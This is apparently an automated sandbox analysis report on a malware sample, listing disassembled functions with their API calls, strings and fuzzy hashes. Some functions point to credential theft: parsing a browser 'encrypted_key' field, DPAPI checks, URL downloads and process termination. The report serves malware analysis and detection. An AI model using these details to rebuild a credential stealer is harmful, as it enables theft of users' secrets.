Opcode ID: 237dd88af5c74adab4b13bca57ee1463c3df570b0aab9420e182108aa891172b
Instruction ID: d0e1c6cf82bd7ebf1cab8c4f32ee6754bb3eaf6e6ff2da7b7fd642e8473a995c
Opcode Fuzzy Hash: 237dd88af5c74adab4b13bca57ee1463c3df570b0aab9420e182108aa891172b
Instruction Fuzzy Hash: E271B171A00119ABDF24CFA8D954AAFBBB6EB88724F14812AED15E7340D774DD41CBA0

Function 00407130 Relevance: 10.6, APIs: 7, Instructions: 141memorylibraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 0040717E
GetProcessHeap.KERNEL32(00000008,00000010), ref: 004071B9
HeapAlloc.KERNEL32(00000000), ref: 004071C0
memcpy.MSVCRT(00000000,?), ref: 004071ED
GetProcessHeap.KERNEL32(00000000,?), ref: 00407203
HeapFree.KERNEL32(00000000), ref: 0040720A
GetProcAddress.KERNEL32(00000000,?), ref: 00407269

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: Heap$Process$AddressAllocFreeLibraryLoadProcmemcpy
String ID:
API String ID: 1745114167-0
Opcode ID: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
Instruction ID: 12ab2d4fc661ad8143b60d879bbfd3a328605d63d86a8d422f2a9a3c01bded70
Opcode Fuzzy Hash: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
Instruction Fuzzy Hash: FE416D71B046059BD720CFA9DC84BAAB3E9FB84305F1445BEE849D7380E739E8508B65

Function 02477397 Relevance: 10.6, APIs: 7, Instructions: 141memorylibraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 024773E5
GetProcessHeap.KERNEL32(00000008,00000010), ref: 02477420
RtlAllocateHeap.NTDLL(00000000), ref: 02477427
memcpy.MSVCRT(00000000,?), ref: 02477454
GetProcessHeap.KERNEL32(00000000,?), ref: 0247746A
HeapFree.KERNEL32(00000000), ref: 02477471
GetProcAddress.KERNEL32(00000000,?), ref: 024774D0

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: Heap$Process$AddressAllocateFreeLibraryLoadProcmemcpy
String ID:
API String ID: 413393563-0
Opcode ID: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
Instruction ID: d5a31c3b07f70e9123bb5173119c919d24209742eb86937da5706cb5882af23d
Opcode Fuzzy Hash: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
Instruction Fuzzy Hash: AB416E71B007059BDB20CF69ED84BAAF7E9EB84309F5445AAE85DC7310E775E810CBA0

Function 00409CD0 Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 123memorystringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000), ref: 00409D08
LocalAlloc.KERNEL32(00000040,?), ref: 00409D3A
StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D63
memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D9C

Strings

, xrefs: 00409DC5
DPAPI, xrefs: 00409D96
"encrypted_key":", xrefs: 00409D5D

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: AllocLocallstrcpymemcmp
String ID: $"encrypted_key":"$DPAPI
API String ID: 4154055062-738592651
Opcode ID: d77c832db12349da7b30ba69df4ba2cf0c7857204c4570defeb58a77868b8b7c
Instruction ID: 867cb166c61f41a869f23d409f67d1e1a1a1e3bdbbf69cd9a3e784fd9bca4893
Opcode Fuzzy Hash: d77c832db12349da7b30ba69df4ba2cf0c7857204c4570defeb58a77868b8b7c
Instruction Fuzzy Hash: 76418A71A0020A9BDB10EF65CD856AF77B5AF44308F04417AE954BB3E2DA78ED05CB98

Function 00417F60 Relevance: 10.6, APIs: 7, Instructions: 118stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00417F84
lstrlenA.KERNEL32(00000000), ref: 00417FB1
lstrcpy.KERNEL32(00000000,00000000), ref: 00417FE0
strtok_s.MSVCRT ref: 00417FF1
StrCmpCA.SHLWAPI(00000000,00435204), ref: 00418025
StrCmpCA.SHLWAPI(00000000,00435204), ref: 00418053
StrCmpCA.SHLWAPI(00000000,00435204), ref: 00418087

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: 0c468244a8143168505cd9d6d1ab1f94799bd3f5708272a995eed29db236200c
Instruction ID: 476cfacc260c43b9b6707cb97608d97a847e356c1d56728458ea849191fa1f26
Opcode Fuzzy Hash: 0c468244a8143168505cd9d6d1ab1f94799bd3f5708272a995eed29db236200c
Instruction Fuzzy Hash: D0417F34A0450ADFCB21DF18D884EEB77B4FF44304F12409AE805AB351DB79AAA6CF95

Function 02488347 Relevance: 10.6, APIs: 7, Instructions: 112stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 0248836C
lstrlen.KERNEL32(00000000), ref: 024883B2
lstrcpy.KERNEL32(00000000,00000000), ref: 024883E1
StrCmpCA.SHLWAPI(00000000,00435204), ref: 024883F9
lstrlen.KERNEL32(00000000), ref: 02488437
lstrcpy.KERNEL32(00000000,00000000), ref: 02488466
strtok_s.MSVCRT ref: 02488476

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlenstrtok_s
String ID:
API String ID: 3280532728-0
Opcode ID: 43023dec0009249c1699197493f64402cd777fe6b66fe5db91421765cffb73b4
Instruction ID: ef00512031e35840f8def6fa7bede836201ed6a9dcb825b9a24717a7b760361b
Opcode Fuzzy Hash: 43023dec0009249c1699197493f64402cd777fe6b66fe5db91421765cffb73b4
Instruction Fuzzy Hash: CA416A7661020A9FDB21EF68D984BAEBBB5EF44704F00801AEC59D7245EB74D941CFA0

Function 024757D7 Relevance: 10.6, APIs: 7, Instructions: 112networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 024757F0
RtlAllocateHeap.NTDLL(00000000), ref: 024757F7
InternetOpenA.WININET(0042D01C,00000000,00000000,00000000,00000000), ref: 0247580D
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,04000100,00000000), ref: 02475828
InternetReadFile.WININET(?,?,00000400,00000001), ref: 02475853
InternetCloseHandle.WININET(?), ref: 02475892
InternetCloseHandle.WININET(00000000), ref: 02475899

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID:
API String ID: 3066467675-0
Opcode ID: 4b94f128dec9b096c0b0ad2455cc516de48ee45f6034d2c2602a7e5d6cf19bdb
Instruction ID: 3e10ef68d211db66c83e64d234da0e04df3db1aad1ea5780371c3da2c54428e0
Opcode Fuzzy Hash: 4b94f128dec9b096c0b0ad2455cc516de48ee45f6034d2c2602a7e5d6cf19bdb
Instruction Fuzzy Hash: 31417B70A00209AFDB24CF55DC48BDAB7B5FF48314F5480AEE919AB3A0D7B1A941CF94

Function 00417DC0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00417DD8

Part of subcall function 0042A1F0: std::exception::exception.LIBCMT ref: 0042A205
Part of subcall function 0042A1F0: __CxxThrowException@8.LIBCMT ref: 0042A21A

std::_Xinvalid_argument.LIBCPMT ref: 00417DF6
std::_Xinvalid_argument.LIBCPMT ref: 00417E11
memcpy.MSVCRT(?,?,?,00000000,?,?,00417CFA,00000000,?,?,00000000,?,004091B6,?), ref: 00417E74

Strings

string too long, xrefs: 00417DF1, 00417E0C
invalid string position, xrefs: 00417DD3

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$Exception@8Throwmemcpystd::exception::exception
String ID: invalid string position$string too long
API String ID: 702443124-4289949731
Opcode ID: f8e74443709f6fd1f3a4696463b8f0e4265ac4588280398e2d67d3aa4e5e97cf
Instruction ID: 79f032b162a4ed5f1b8d8c3a7f5ff0854d2ec62b836a1cb7fb32b648417a52a7
Opcode Fuzzy Hash: f8e74443709f6fd1f3a4696463b8f0e4265ac4588280398e2d67d3aa4e5e97cf
Instruction Fuzzy Hash: 5921C3323047008BD7249E2CE980B6AB7F5AF95720F604A6FF4968B381D775DC8187A9

Function 00408880 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 89COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004088B3

Part of subcall function 0042A1A3: std::exception::exception.LIBCMT ref: 0042A1B8
Part of subcall function 0042A1A3: __CxxThrowException@8.LIBCMT ref: 0042A1CD

Strings

yxxx, xrefs: 0040890A
yxxx, xrefs: 004088BD
x@, xrefs: 00408954
vector<T> too long, xrefs: 004088AE
x@, xrefs: 004088EC, 004088EF

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception
String ID: vector<T> too long$yxxx$yxxx$x@$x@
API String ID: 2884196479-4254290729
Opcode ID: ccec9a3570fd5dde12dbfba51e33401b3f4037cced4bc9963d9987cc80863dde
Instruction ID: 642d6f8d25606cb57c5c368211f8c71801378994f2d8b98954bdbb6ac3618ebc
Opcode Fuzzy Hash: ccec9a3570fd5dde12dbfba51e33401b3f4037cced4bc9963d9987cc80863dde
Instruction Fuzzy Hash: 3F31B7B5E005159BCB08DF58C9906AEBBB6EB88310F14827EE905EB385DB34A901CBD5

Function 02492A87 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 02492A9C
RtlAllocateHeap.NTDLL(00000000), ref: 02492AA3

Part of subcall function 02492B17: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 02492B2C
Part of subcall function 02492B17: RtlAllocateHeap.NTDLL(00000000), ref: 02492B33
Part of subcall function 02492B17: RegOpenKeyExA.ADVAPI32(80000002,00638B98,00000000,00020119,02492AB0), ref: 02492B52
Part of subcall function 02492B17: RegQueryValueExA.ADVAPI32(02492AB0,0043565C,00000000,00000000,00000000,000000FF), ref: 02492B6C
Part of subcall function 02492B17: RegCloseKey.ADVAPI32(02492AB0), ref: 02492B76

RegOpenKeyExA.ADVAPI32(80000002,00638B98,00000000,00020119,024897C7), ref: 02492AD8
RegQueryValueExA.ADVAPI32(024897C7,00638C34,00000000,00000000,00000000,000000FF), ref: 02492AF3
RegCloseKey.ADVAPI32(024897C7), ref: 02492AFD

Strings

Windows 11, xrefs: 02492AB7

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: 74fdb98eb98f73a9fad628fe2b7ff6a3fcb41b0f7c395888142856023f75cff2
Instruction ID: 8887e72a3d8a42cd3d53119fcf791ec308258582059de93786207d5c2091b6ef
Opcode Fuzzy Hash: 74fdb98eb98f73a9fad628fe2b7ff6a3fcb41b0f7c395888142856023f75cff2
Instruction Fuzzy Hash: BC018B71640309BFEB14DBA4AC89EEA7B6EEB44315F00115ABE09D3290DAB099448BE0

Function 02477C07 Relevance: 10.1, APIs: 8, Instructions: 109stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02477977: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 024779AC
Part of subcall function 02477977: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 024779F1
Part of subcall function 02477977: strlen.MSVCRT ref: 02477A25
Part of subcall function 02477977: StrStrA.SHLWAPI(?,0043508C), ref: 02477A5F
Part of subcall function 02477977: strcpy_s.MSVCRT ref: 02477A88
Part of subcall function 02477977: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02477A93
Part of subcall function 02477977: HeapFree.KERNEL32(00000000), ref: 02477A9A
Part of subcall function 02477977: strlen.MSVCRT ref: 02477AA7

lstrcat.KERNEL32(00638E68,0043509C), ref: 02477C37
lstrcat.KERNEL32(00638E68,?), ref: 02477C64
lstrcat.KERNEL32(00638E68,004350A0), ref: 02477C76
lstrcat.KERNEL32(00638E68,?), ref: 02477C97
wsprintfA.USER32 ref: 02477CB7
lstrcpy.KERNEL32(00000000,?), ref: 02477CE0
lstrcat.KERNEL32(00638E68,00000000), ref: 02477CEE
lstrcat.KERNEL32(00638E68,0043509C), ref: 02477D07

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcat$Heapstrlen$EnumFreeOpenProcessValuelstrcpystrcpy_swsprintf
String ID:
API String ID: 2460923012-0
Opcode ID: 1b33f8e6ae0bd5b6c31613e9ea586c2b36b80fb2e963691b99dbe2669c738b8a
Instruction ID: 7541028936cb8b51bb13517f42fbdde19cb7448eac0824cce1a5950a63b45afd
Opcode Fuzzy Hash: 1b33f8e6ae0bd5b6c31613e9ea586c2b36b80fb2e963691b99dbe2669c738b8a
Instruction Fuzzy Hash: 5431B572900214EFDB24DB64DC44AEBFB7ABB88714B64151EFA1993310DB74E941CBA0

Function 0248DB27 Relevance: 9.1, APIs: 6, Instructions: 128registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0248DB53
RegOpenKeyExA.ADVAPI32(80000001,00638CD8,00000000,00020119,?,00000000,000000FE), ref: 0248DB73
RegQueryValueExA.ADVAPI32(?,006388D4,00000000,00000000,?,?), ref: 0248DB9A
RegCloseKey.ADVAPI32(?), ref: 0248DBA5
lstrcat.KERNEL32(?,?), ref: 0248DBCB
lstrcat.KERNEL32(?,00638968), ref: 0248DBDD

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: 69500862d738dca9bfa499551e5225b9e751b41ace5b549e9b88ef694551efee
Instruction ID: ce9bde37af921b4991c5c62db5fe0d240aae2f0c0f9c4ef8286bd54c1aa78182
Opcode Fuzzy Hash: 69500862d738dca9bfa499551e5225b9e751b41ace5b549e9b88ef694551efee
Instruction Fuzzy Hash: D6415CB16142499FD714EF25DC45FDE77EAAF84704F00882EB99C872A0DA71E948CF92

Function 02494787 Relevance: 9.1, APIs: 6, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,?,?,0248558F), ref: 024947CC
RtlAllocateHeap.NTDLL(00000000), ref: 024947D3
wsprintfW.USER32 ref: 024947E2
OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 02494851
TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 02494860
CloseHandle.KERNEL32(00000000,?,?), ref: 02494867

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
String ID:
API String ID: 885711575-0
Opcode ID: 86b9f473664707f9828ef1b286254fe0fdbf0f8e23cb3414a50381cb6247922d
Instruction ID: 31569ac6d8edf4d734cc611177d9884f7317d5839b6ae7eacd9e1a6831f1f446
Opcode Fuzzy Hash: 86b9f473664707f9828ef1b286254fe0fdbf0f8e23cb3414a50381cb6247922d
Instruction Fuzzy Hash: B2318F71A00244BBDB20DFA5DC89FDEBB7AAF44740F100059FA05E7180DBB0A6418BA5

Function 00409AE0 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,004012EE), ref: 00409AFA
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,004012EE), ref: 00409B10
LocalAlloc.KERNEL32(00000040,?,?,?,?,004012EE), ref: 00409B27
ReadFile.KERNEL32(00000000,00000000,?,004012EE,00000000,?,?,?,004012EE), ref: 00409B40
LocalFree.KERNEL32(?,?,?,?,004012EE), ref: 00409B60
CloseHandle.KERNEL32(00000000,?,?,?,004012EE), ref: 00409B67

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 27aadecc548f36f42eb2dce9c3a0e69697191336073de94daf9abdf25517cddd
Instruction ID: d5e2846254d17b4b79341e9ac440d2f7db04c9e9ad0a28dbd651dd387858d46a
Opcode Fuzzy Hash: 27aadecc548f36f42eb2dce9c3a0e69697191336073de94daf9abdf25517cddd
Instruction Fuzzy Hash: 06114C71A00209AFE7109FA5ED84ABB737DFB04750F10016AB904A72C1EB78BD408BA8

Function 004089B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004089C6

Part of subcall function 0042A1F0: std::exception::exception.LIBCMT ref: 0042A205
Part of subcall function 0042A1F0: __CxxThrowException@8.LIBCMT ref: 0042A21A

std::_Xinvalid_argument.LIBCPMT ref: 004089FD

Part of subcall function 0042A1A3: std::exception::exception.LIBCMT ref: 0042A1B8
Part of subcall function 0042A1A3: __CxxThrowException@8.LIBCMT ref: 0042A1CD

memcpy.MSVCRT(?,00000000,?,00000000,?,?,00408800,?,00000000,004077D7), ref: 00408A5B

Strings

string too long, xrefs: 004089F8
invalid string position, xrefs: 004089C1

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception$memcpy
String ID: invalid string position$string too long
API String ID: 2202983795-4289949731
Opcode ID: a1c32616d7e307a16c2fa6441a0b7187f150f24f1c37d319d238f952b07782fc
Instruction ID: 649aac53c67e3ee9f5cf0101b70db7c319c758bc323567c03d989288a4630d66
Opcode Fuzzy Hash: a1c32616d7e307a16c2fa6441a0b7187f150f24f1c37d319d238f952b07782fc
Instruction Fuzzy Hash: 0721F6723006108BC720AA5CEA40A6BF7A9DBA1760B20093FF181DB7C1DA79D841C7ED

Function 00408B50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(004078EE,004088DD,03C3C3C3,00000401,004078EE,?,00000000,?,004078EE,80000001), ref: 00408B70
std::exception::exception.LIBCMT ref: 00408B8B
__CxxThrowException@8.LIBCMT ref: 00408BA0

Strings

Pv@, xrefs: 00408B99
x@, xrefs: 00408B7D, 00408B80

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
